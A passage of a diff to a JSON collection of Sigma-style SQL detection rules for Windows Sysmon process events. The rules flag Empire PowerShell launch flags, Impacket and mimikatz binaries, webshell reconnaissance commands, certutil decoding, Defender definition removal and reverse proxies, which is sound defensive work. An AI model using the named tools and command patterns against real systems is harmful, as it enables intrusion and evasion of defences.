'%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_amsi_null_bits_bypass.yml" + "filename": "proc_creation_win_scrcons_susp_child_process.yml" }, { - "title": "New Network Trace Capture Started Via Netsh.EXE", - "id": 
"d3c3861d-c504-4c77-ba55-224ba82d0118", + "title": "HackTool - Empire PowerShell Launch Parameters", + "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "status": "test", - "description": "Detects the execution of netsh with the \"trace\" flag in order to start a network capture", - "author": "Kutepov Anton, oscd.community", + "description": "Detects suspicious powershell command line parameters used in Empire", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administration activity" + "Other tools that incidentally use the same command line parameters" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_packet_capture.yml" + "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" }, { - "title": "DumpStack.log Defender Evasion", - "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", - "status": "test", - "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious MsiExec Embedding Parent", + "id": "4a2a2c3e-209f-4d01-b513-4155a540b469", + "status": 
"experimental", + "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", + "author": "frack113", "tags": [ + "attack.t1218.007", "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%MsiExec.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%-Embedding %' ESCAPE '\\') AND NOT ((Image LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\MsiExec.exe -Embedding %' ESCAPE '\\' AND ParentCommandLine LIKE '%Global\\\\MSI0000%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" + "filename": "proc_creation_win_msiexec_embedding.yml" }, { - "title": "Potential PowerShell Obfuscation Via WCHAR", - "id": "e312efd0-35a1-407f-8439-b8d434b438a6", + "title": "HackTool - Impacket Tools Execution", + "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "status": "test", - "description": "Detects suspicious encoded character syntax often used for defense evasion", + "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.t1557.001" ], 
"falsepositives": [ - "Unknown" + "Legitimate use of the impacket tools" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\goldenPac%' ESCAPE '\\' OR Image LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR Image LIKE '%\\\\kintercept%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\rpcdump%' ESCAPE '\\' OR Image LIKE '%\\\\samrdump%' ESCAPE '\\' OR Image LIKE '%\\\\secretsdump%' ESCAPE '\\' OR Image LIKE '%\\\\smbexec%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\wmiexec%' ESCAPE '\\' OR Image LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (Image LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" + "filename": "proc_creation_win_hktl_impacket_tools.yml" }, { - "title": "PowerShell Download Pattern", - "id": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", - "status": "test", - "description": "Detects a Powershell process that contains download commands in its command line string", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Webshell Detection With Command Line Keywords", + "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "status": "experimental", + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%net.webclient).%' ESCAPE '\\' AND CommandLine LIKE '%download%' ESCAPE '\\' AND (CommandLine LIKE '%string(%' ESCAPE '\\' OR CommandLine LIKE '%file(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE 
'%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\quser.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_download_patterns.yml" + "filename": "proc_creation_win_webshell_detection.yml" }, { - "title": "Suspicious Execution of InstallUtil Without Log", - "id": 
"d042284c-a296-4988-9be5-f424fadcc28c", + "title": "Windows Defender Definition Files Removed", + "id": "9719a8aa-401c-41af-8108-ced7ec9cd75c", "status": "test", - "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' AND Image LIKE '%Microsoft.NET\\\\Framework%' ESCAPE '\\' AND CommandLine LIKE '%/logfile= %' ESCAPE '\\' AND CommandLine LIKE '%/LogToConsole=false%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR OriginalFileName = 'MpCmdRun.exe') AND (CommandLine LIKE '% -RemoveDefinitions%' ESCAPE '\\' AND CommandLine LIKE '% -All%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_instalutil_no_log_execution.yml" + "filename": "proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Process", - "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", + "title": "PUA - AdFind Suspicious Execution", + "id": "9a132afa-654e-11eb-ae93-0242ac130002", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects AdFind execution with common flags seen used during attacks", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - 
"attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unknown" + "Legitimate admin activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_wmp.yml" + "filename": "proc_creation_win_pua_adfind_susp_usage.yml" }, { - "title": "Use of UltraVNC Remote Access Software", - "id": "145322e4-0fd3-486b-81ca-9addc75736d8", + "title": "Lolbin Ssh.exe Use As Proxy", + 
"id": "7d6d30b8-5b91-4b90-a891-46cccaf29598", "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", - "author": "frack113", + "description": "Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate use" + "Legitimate usage for administration purposes" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'VNCViewer' OR Product = 'UltraVNC VNCViewer' OR Company = 'UltraVNC' OR OriginalFileName = 'VNCViewer.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\OpenSSH\\\\sshd.exe' ESCAPE '\\' OR (Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND (CommandLine LIKE '%ProxyCommand=%' ESCAPE '\\' OR (CommandLine LIKE '%PermitLocalCommand%' ESCAPE '\\' AND CommandLine LIKE '%LocalCommand%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_ultravnc.yml" + "filename": "proc_creation_win_lolbin_ssh.yml" }, { - "title": "Automated Collection Command Prompt", - "id": "f576a613-2392-4067-9d1a-9345fb58d8d1", + "title": "LOLBIN From Abnormal Drive", + "id": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "author": "frack113", + "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti'", "tags": [ - "attack.collection", - 
"attack.t1119", - "attack.credential_access", - "attack.t1552.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur on servers with multiple drives." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.docx%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx%' ESCAPE '\\' OR CommandLine LIKE '%.ppt%' ESCAPE '\\' OR CommandLine LIKE '%.pptx%' ESCAPE '\\' OR CommandLine LIKE '%.rtf%' ESCAPE '\\' OR CommandLine LIKE '%.pdf%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\') AND ((CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /b %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\') OR (OriginalFileName = 'FINDSTR.EXE' AND (CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /si %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'CALC.EXE', 'MSHTA.EXE', 'cscript.exe', 'wscript.exe', 'REGSVR32.EXE', 'installutil.exe', 'CMSTP.EXE')) AND NOT ((CurrentDirectory LIKE '%C:\\\\%' ESCAPE '\\') OR (CurrentDirectory = '') OR (CurrentDirectory = '')))" ], - "filename": "proc_creation_win_susp_automated_collection.yml" + "filename": "proc_creation_win_lolbin_not_from_c_drive.yml" }, { - "title": "Use of TTDInject.exe", - "id": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", + "title": "Port Forwarding Attempt Via SSH", + "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", "status": 
"experimental", - "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", - "author": "frack113", + "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1572", + "attack.t1021.001", + "attack.t1021.004" ], "falsepositives": [ - "Legitimate use" + "Administrative activity using a remote port forwarding to a local port" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%ttdinject.exe' ESCAPE '\\' OR OriginalFileName = 'TTDInject.EXE'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_ttdinject.yml" + "filename": "proc_creation_win_ssh_port_forward.yml" }, { - "title": "Windows Processes Suspicious Parent Directory", - "id": "96036718-71cc-4027-a538-d1587e0006a7", - "status": "test", - "description": "Detect suspicious parent processes of well-known Windows processes", - "author": "vburov", + "title": "Use Short Name Path in Command Line", + "id": "349d891d-fef0-4fe4-bc53-eee623a15969", + "status": "experimental", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1036.003", - "attack.t1036.005" + "attack.t1564.004" ], "falsepositives": [ - "Some security products seem to spawn these" + "Applications could use this notation occasionally which might generate some false positives. 
In that case investigate the parent and child process." ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsm.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\services.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsaiso.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\') AND NOT (((ParentImage LIKE '%\\\\SavService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\') AND ParentImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (ParentImage = '' OR ParentImage = '-')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%~1\\\\%' ESCAPE '\\' OR CommandLine LIKE '%~2\\\\%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\GPSoftware\\\\Directory Opus\\\\dopus.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\veam.backup.shell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winget.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Everything\\\\Everything.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%\\\\appdata\\\\local\\\\webex\\\\webex64\\\\meetings\\\\wbxreport.exe%' ESCAPE '\\' OR 
CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\cmd\\\\scalar.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_proc_wrong_parent.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_path_use_cli.yml" }, { - "title": "Sdclt Child Processes", - "id": "da2738f2-fadb-4394-afa7-0a0674885afa", + "title": "File Decoded From Base64/Hex Via Certutil.EXE", + "id": "cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", "status": "test", - "description": "A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-decode %' ESCAPE '\\' OR CommandLine LIKE '%/decode %' ESCAPE '\\' OR CommandLine LIKE '%-decodehex %' ESCAPE '\\' OR CommandLine LIKE '%/decodehex %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sdclt_child_process.yml" + "filename": "proc_creation_win_certutil_decode.yml" }, { - "title": "Suspicious Download From Direct IP Via Bitsadmin", - "id": "99c840f2-2012-46fd-9141-c761987550ef", + "title": "PUA - Fast 
Reverse Proxy (FRP) Execution", + "id": "32410e29-5f94-4568-b6a3-d91a8adad863", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\frpc.exe' ESCAPE '\\' OR Image LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = 
